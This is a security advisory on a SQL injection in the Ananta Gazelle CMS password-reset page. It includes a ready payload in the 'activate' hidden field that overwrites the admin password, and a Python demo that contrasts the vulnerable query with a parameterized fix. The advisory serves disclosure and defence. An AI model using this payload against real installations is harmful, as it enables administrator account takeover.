Ananta Gazelle SQL Injection Vulnerability
##########################www.BugReport.ir##################################
#
# AmnPardaz Security Research Team
#
# Title:              Ananta Gazelle SQL Injection Vulnerability
# Vendor:             http://www.anantasoft.com/
# Vulnerable Version: 1.0 (latest version at the time of writing)
# Exploitation:       Remote with browser
# Fix:                N/A
############################################################################
####################
- Description:
####################
Ananta Gazelle is a JavaScript-rich CMS with multiple CSS templates. It is
written in PHP and uses MySQL. According to the comments in its source,
nearly all of its queries are deliberately written without any user input
in order to avoid SQL injection. The forgotten-password page is an exception.
####################
- Vulnerability:
####################
+--> SQL Injection
	The forgotten-password page "forgot.php" builds the query that sets a
	user's activation code from hidden form inputs. Hidden inputs are fully
	attacker-controlled, so the query can be rewritten; this can be used to
	change the password of any user, including the administrator.
####################
- Exploits/PoCs:
####################
+--> Exploiting The (MySQL) SQL Injection:
	Three parameters are affected: 'table', 'activate' and 'email'. All of
	them are placed into the query unescaped and all of them can be used for
	injection. For example, the password of the admin user can be changed to
	"mypass" by submitting the form with the following values:
		table="users"          (unchanged)
		activate="123', pass=md5('mypass'), activate='456"
		email="<the email address of the admin user>"
	The injected value closes the string literal for the activation code,
	appends a second assignment that overwrites the 'pass' column with the
	MD5 of the chosen password, and then reopens a string literal so the
	rest of the original query stays syntactically valid.
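The following Python model, added here as an illustration and not taken from the advisory or from the Gazelle code base, reproduces the effect of the payload above. The exact query in forgot.php is not shown in the advisory, so the statement shape `UPDATE <table> SET activate='<code>' WHERE email='<email>'`, the column names `pass` and `activate`, and the sample admin row are assumptions. It uses an in-memory SQLite database with a user-defined `md5()` function standing in for MySQL's built-in, and places the vulnerable string-built query beside the hardened form the Solution section calls for (table name taken from the server-side session and checked against an allow-list, values passed as bound parameters).

```python
import hashlib
import sqlite3

# Constructed stand-in for the Gazelle "users" table; the column names are
# assumptions, as the advisory does not show the schema. The seeded password
# hash is md5("123456"), chosen only as a recognisable placeholder.
SCHEMA = """
CREATE TABLE users (
    id       INTEGER PRIMARY KEY,
    email    TEXT NOT NULL,
    pass     TEXT NOT NULL,
    activate TEXT
);
INSERT INTO users (email, pass, activate)
VALUES ('admin@example.com', 'e10adc3949ba59abbe56e057f20f883e', NULL);
"""

ADMIN_EMAIL = "admin@example.com"
ALLOWED_TABLES = {"users"}          # server-side allow-list for the hardened path

# The payload from the advisory: closes the activate literal, overwrites pass,
# then reopens a literal so the trailing quote of the original query still fits.
PAYLOAD = "123', pass=md5('mypass'), activate='456"


def md5_hex(s):
    """MySQL-style md5(): hex digest of the UTF-8 bytes."""
    return hashlib.md5(s.encode()).hexdigest()


def fresh_db():
    """In-memory SQLite with md5() registered so md5('mypass') evaluates as in MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, md5_hex)
    conn.executescript(SCHEMA)
    return conn


def vulnerable_forgot(conn, table, activate, email):
    """Hypothetical model of forgot.php: hidden form fields pasted straight into SQL."""
    query = "UPDATE %s SET activate='%s' WHERE email='%s'" % (table, activate, email)
    conn.execute(query)
    conn.commit()
    return query


def hardened_forgot(conn, session, activate, email):
    """Table name comes from the session and an allow-list; values are bound parameters."""
    table = session["table"]
    if table not in ALLOWED_TABLES:
        raise ValueError("unexpected table name")
    query = "UPDATE %s SET activate=? WHERE email=?" % table   # table is allow-listed, not user input
    conn.execute(query, (activate, email))
    conn.commit()
    return query


def admin_row(conn):
    """Return (pass, activate) for the admin user."""
    return conn.execute(
        "SELECT pass, activate FROM users WHERE email=?", (ADMIN_EMAIL,)
    ).fetchone()


def demo():
    # Vulnerable path: the payload rewrites the admin password to md5('mypass').
    c = fresh_db()
    vulnerable_forgot(c, "users", PAYLOAD, ADMIN_EMAIL)
    after_vuln = admin_row(c)

    # Hardened path: the same payload is stored verbatim as an activation code
    # and the password is untouched.
    c2 = fresh_db()
    hardened_forgot(c2, {"table": "users"}, PAYLOAD, ADMIN_EMAIL)
    after_hard = admin_row(c2)
    return after_vuln, after_hard


if __name__ == "__main__":
    print(demo())
```

In the vulnerable path the generated statement reads `UPDATE users SET activate='123', pass=md5('mypass'), activate='456' WHERE email='admin@example.com'`; both MySQL and SQLite accept the duplicated `activate` assignment, and the password column is overwritten as a side effect. Note that the `table` field being client-controlled is a second problem in its own right: even with quoting fixed, an attacker could point the update at another table, which is why the hardened version reads the table name from the session and checks it against an allow-list rather than escaping it.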
####################
- Solution:
####################
Do not trust hidden form inputs: keep the target table and the other
parameters of forgot.php in the server-side session instead of in the form,
validate the table name against a fixed list, and escape or bind the
remaining values (e.g. mysql_real_escape_string or prepared statements)
before they reach the query.
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_70.htm
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com